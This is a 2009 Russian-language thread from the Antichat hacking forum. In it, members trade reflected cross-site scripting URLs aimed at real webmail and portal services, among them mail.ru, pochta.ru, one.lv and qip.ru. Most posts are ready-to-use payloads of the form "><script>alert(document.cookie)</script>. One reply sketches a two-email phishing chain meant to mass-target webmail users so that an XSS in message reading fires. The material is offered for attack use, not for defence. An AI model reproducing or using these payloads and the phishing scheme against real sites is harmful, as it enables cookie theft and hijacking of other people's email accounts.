ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.09.2009, 16:57
Аватар для Ruslan1817
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию

http://torg.mail.ru/844/res/?&"><script>alert(document.cookie)</script>[sort]=2
 
Ответить с цитированием

  #2  
Старый 24.09.2009, 17:03
Аватар для Ruslan1817
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию

http://torg.mail.ru/835/138479/?%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Etab_id=2
 
Ответить с цитированием

  #3  
Старый 24.09.2009, 17:30
Аватар для Ruslan1817
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию

https://kvbilling.mail.ru/stat/?date=16-09-2009&tillDate=23-09-2009&showStats=showStats&pn=1"><script>alert('Sin3 v')</script>
от Sinva

подправил
https://kvbilling.mail.ru/stat/?date=16-09-2009&tillDate=23-09-2009&showStats=showStats&pn=1%3Cimg%20src=%22%3E%3 Cscript%3Ealert(document.cookie)%3C/script%3E

Последний раз редактировалось Ruslan1817; 24.09.2009 в 23:01..
 
Ответить с цитированием

  #4  
Старый 28.09.2009, 06:16
Аватар для Ruslan1817
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию

мэил.ру

http://torg.mail.ru/2121/?'path_id=1229%22%3E%3Cscript%3Ealert(document.coo kie)%3C/script%3E

http://torg.mail.ru/109/310670/?'tab_id=2%22%3E%3Cscript%3Ealert(document.cookie) %3C/script%3E
 
Ответить с цитированием

  #5  
Старый 29.09.2009, 17:39
Аватар для Details
Details
Новичок
Регистрация: 28.09.2009
Сообщений: 2
Провел на форуме:
6089

Репутация: 0
По умолчанию

Цитата:
Сообщение от Ruslan1817  
мэил.ру

http://torg.mail.ru/2121/?'path_id=1229%22%3E%3Cscript%3Ealert(document.coo kie)%3C/script%3E

http://torg.mail.ru/109/310670/?'tab_id=2%22%3E%3Cscript%3Ealert(document.cookie) %3C/script%3E
Уже прикрыли))
 
Ответить с цитированием

  #6  
Старый 28.09.2009, 13:41
Аватар для darkwkz
darkwkz
Участник форума
Регистрация: 18.03.2009
Сообщений: 130
Провел на форуме:
332909

Репутация: 103
Отправить сообщение для darkwkz с помощью ICQ
По умолчанию

one.lv
PHP код:
http://c3.one.lv/welcome?language=ru%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E 
 
Ответить с цитированием

pochta.ru
  #7  
Старый 29.09.2009, 17:03
Аватар для Details
Details
Новичок
Регистрация: 28.09.2009
Сообщений: 2
Провел на форуме:
6089

Репутация: 0
По умолчанию pochta.ru

http://www.pochta.ru/games/?ids=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
 
Ответить с цитированием

  #8  
Старый 30.09.2009, 11:00
Аватар для Ruslan1817
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию

http://win.mail.ru/cgi-bin/readmsg?id=12538544950000000180"><script>alert(doc ument.cookie)</script>

Тока не орем))
Тут мне прислали письмо с QUELLE ( заказывал себе хрень одну ) при вводе скрипта в адресную строку я получил свои куки, но на других эта XSS не работает т.к. соответственно письмицо у них отсутствует ... есть какие небудь предложения по этому поводу ? Если надо выложу скрин.
 
Ответить с цитированием

  #9  
Старый 25.10.2009, 17:00
Аватар для zpurgenz
zpurgenz
Новичок
Регистрация: 24.10.2009
Сообщений: 2
Провел на форуме:
23183

Репутация: 3
По умолчанию

Цитата:
Сообщение от Ruslan1817  
http://win.mail.ru/cgi-bin/readmsg?id=12538544950000000180"><script>alert(doc ument.cookie)</script>
По поводу этой штуки работает многоходовка, да и работает ли...?
Отсылаем мыло. В мыле img на вашем сайте, который запустит скажем php скрипт который узнает рефер (id письма) и вышлет еще одно письмо. С ссылкой XSS на первое письмо....
Даже если первое письмо удалят, оно валяется в удаленных и все равно сработает, т.к. второе письмо прилетит как только откроют перовое... НО надо ведь, что бы первое письмо открыли, а во втором письме прошли по ссылке конечно если разослать миллиону товарищей то возможно эффект будет...

ЗЫ Совсем забыла, XSS работает если в письме есть вложение.

Последний раз редактировалось zpurgenz; 25.10.2009 в 17:07..
 
Ответить с цитированием

  #10  
Старый 26.10.2009, 17:58
Аватар для satana-fu
satana-fu
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
Провел на форуме:
2485155

Репутация: 719
Отправить сообщение для satana-fu с помощью ICQ
По умолчанию

пассивная xss на qip.ru


работает только у авторизованных
Цитата:
http://file.qip.ru/account/myAccount.jsp?sId="><script>alert(document.cookie) </script>
Цитата:
http://file.qip.ru/account/settings.jsp?sId="><script>alert(document.cookie)</script>
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ] Cawabunga Сценарии/CMF/СMS 7 04.02.2010 02:55
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ